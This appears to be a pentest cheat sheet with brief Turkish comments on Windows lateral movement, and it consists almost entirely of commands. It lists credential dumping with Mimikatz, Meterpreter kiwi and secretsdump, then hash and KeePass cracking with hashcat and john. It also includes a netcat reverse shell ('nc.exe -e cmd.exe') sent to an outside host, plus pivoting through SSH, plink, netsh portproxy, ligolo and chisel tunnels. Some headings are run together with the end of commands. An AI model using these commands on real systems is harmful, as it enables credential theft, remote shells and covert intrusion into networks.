Windows Lateral Movement
Mimikatz
Link: https://github.com/ParrotSec/mimikatz
.\mimikatz.exe
privilege::debug # Yetki kontrolΓΌ
token::elevate # Yetki yΓΌkseltme
lsadump::sam # Local KullanΔ±cΔ± Hashleri
lsadump::secrets
sekurlsa::logonpasswords
sekurlsa::tickets
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --forceHash Dumping
impacket-secretsdump -sam sam -system system local
migrate -N lsass.exe
hashdump
load kiwi
creds_all
lsa_dump_sam
lsa_dump_secrets
john --format=NT hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
hashcat -a3 -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
keepass2john Database.kdbx > hash.txt
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --forcePort Forwarding
# Local
systemctl start ssh
mousepad /etc/proxychains4.conf
#socks5 127.0.0.1 9999
# SSH Tunneling
ssh -N -R 9999 root@192.168.1.2
proxychains nmap -v -sT -Pn -n 172.168.1.3
# Plink Tunnel
C:\Windows\Temp\nc.exe -e cmd.exe 192.168.1.2 1234
C:\Windows\Temp\plink.exe -ssh -l root -pw root -R 127.0.0.1:3390:127.0.0.1:3389 192.168.1.3
nmap -sT -p 3390 127.0.0.1
# Netsh Tunnel (Local Admin Gerekir)
netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.1.3 connectport=22 connectaddress=10.0.0.4
netsh interface portproxy show all
netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.1.3 localport=2222 action=allow
ssh database_admin@192.168.1.3 -p 2222
netsh advfirewall firewall delete rule name="port_forward_ssh_2222"
netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.64
# Meterpreter
portfwd add -l 1234 -p 80 -r 10.0.0.1/24
# Ligolo
./proxy -selfcert -laddr 0.0.0.0:443
./agent.exe -ignore-cert -connect 192.168.1.2:443
# Chisel
./chisel.exe server --port 9999 --reverse
./chisel client 192.168.1.3:9999 R:8000:127.0.0.1:80Last updated